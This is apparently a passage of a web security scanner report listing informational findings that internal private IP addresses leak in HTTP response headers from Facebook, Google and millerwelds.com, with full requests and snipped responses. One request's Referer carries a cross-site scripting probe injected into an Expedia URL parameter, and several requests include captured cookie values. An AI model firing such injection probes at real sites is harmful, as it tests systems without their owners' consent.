Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.213.79
X-Cnection: close
Date: Fri, 06 May 2011 22:42:01 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.129. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.216.121
X-Cnection: close
Date: Sat, 07 May 2011 02:44:22 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.130. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.73.39
X-Cnection: close
Date: Fri, 06 May 2011 22:33:36 GMT
Content-Length: 6764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.131. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.57.127
X-Cnection: close
Date: Sat, 07 May 2011 02:44:28 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.132. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.89.71
X-Cnection: close
Date: Fri, 06 May 2011 22:35:18 GMT
Content-Length: 6764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.133. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.77.128
X-Cnection: close
Date: Sat, 07 May 2011 02:47:57 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.134. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.169.33
X-Cnection: close
Date: Sat, 07 May 2011 11:25:00 GMT
Content-Length: 6760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.135. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.168.125
X-Cnection: close
Date: Sat, 07 May 2011 02:50:30 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.136. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=5d43e'%3balert(1)//b4e195f70d4&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.183.65
X-Cnection: close
Date: Sat, 07 May 2011 11:24:51 GMT
Content-Length: 6949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.137. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.96.79
X-Cnection: close
Date: Fri, 06 May 2011 22:35:36 GMT
Content-Length: 6764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.138. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13d670d48%26origin%3Dhttp%253A%252F%252Fwww.scmagazineus.com%252Ff25bffff5c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=290&href=http%3A%2F%2Fwww.facebook.com%2Fhome.php%23%2521%2FSCMag&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.231.42
X-Cnection: close
Date: Sat, 07 May 2011 01:50:43 GMT
Content-Length: 16849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.139. http://www.google.com/sdch/vD843DpA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR
If-Modified-Since: Fri, 06 May 2011 12:47:04 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Fri, 06 May 2011 20:20:35 GMT
Date: Fri, 06 May 2011 21:05:56 GMT
Expires: Fri, 06 May 2011 21:05:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&amp;q=related: http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &amp;rct=j&amp;sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google
...[SNIP]...
<a href="/search?hl=en&amp;q=related:http://172.31.196.197:8888/search?q=cache: &amp;cd= &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...
28.140. http://www.millerwelds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC; __utma=94003201.1070057693.1303147760.1303147760.1304727090.2; __utmb=94003201.1.10.1304727090; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 13 Jan 2011 19:37:29 GMT
Content-Length: 3638
Date: Fri, 06 May 2011 19:11:42 GMT
X-Varnish: 1128233734 1128212240
Age: 128
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

..............h...&... ..............(....... ...........@.............................P.OOO......V..................777..p5.............___...........m..c"...............\...........................
...[SNIP]...
28.141. http://www.millerwelds.com/financing/images/darkhead_min.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/darkhead_min.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /financing/images/darkhead_min.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/png
Expires: Wed, 11 May 2011 08:33:11 GMT
Last-Modified: Thu, 13 Jan 2011 17:59:38 GMT
Content-Length: 285
Date: Fri, 06 May 2011 19:11:36 GMT
X-Varnish: 1128232818 1097587348
Age: 211106
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

.PNG
.
...IHDR...4.........,.o5...?PLTE......DqL...a.dDqKHtO...n.n............\.^KwQ......Z.]FsLBpJBpI........IDATh...Y..@.C...*(..Y......uK..v...4];.2..Z...3,..D*.d.fZ..He4........C..4..6......@..
...[SNIP]...
28.142. http://www.millerwelds.com/financing/images/lighthead_min.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/lighthead_min.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /financing/images/lighthead_min.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/png
Expires: Wed, 11 May 2011 08:33:11 GMT
Last-Modified: Thu, 13 Jan 2011 17:59:38 GMT
Content-Length: 205
Date: Fri, 06 May 2011 19:11:36 GMT
X-Varnish: 1128232851 1097587372
Age: 211106
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

.PNG
.
...IHDR...4...    ........(...!PLTE.................................x#U....gIDATh......0..............U...#=..,.Z,G.?...s.[...H..*.GQ......#RcP..EE.(.#5..".l@..    ....,.Z,..H..&....w...U.....IEN
...[SNIP]...
28.143. http://www.millerwelds.com/financing/images/plinenavbody_min.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/plinenavbody_min.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /financing/images/plinenavbody_min.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/png
Expires: Wed, 11 May 2011 08:33:09 GMT
Last-Modified: Thu, 13 Jan 2011 17:59:38 GMT
Content-Length: 128
Date: Fri, 06 May 2011 19:11:36 GMT
X-Varnish: 1128232819 1097587242
Age: 211107
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

.PNG
.
...IHDR.............z.......PLTE.........tf.....;.......)IDATH...... ...W.es.m    ......HKKKKKKKK/L.>3.4W......IEND.B`.
28.144. http://www.millerwelds.com/financing/images/plinenavfoot_min.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/plinenavfoot_min.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /financing/images/plinenavfoot_min.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
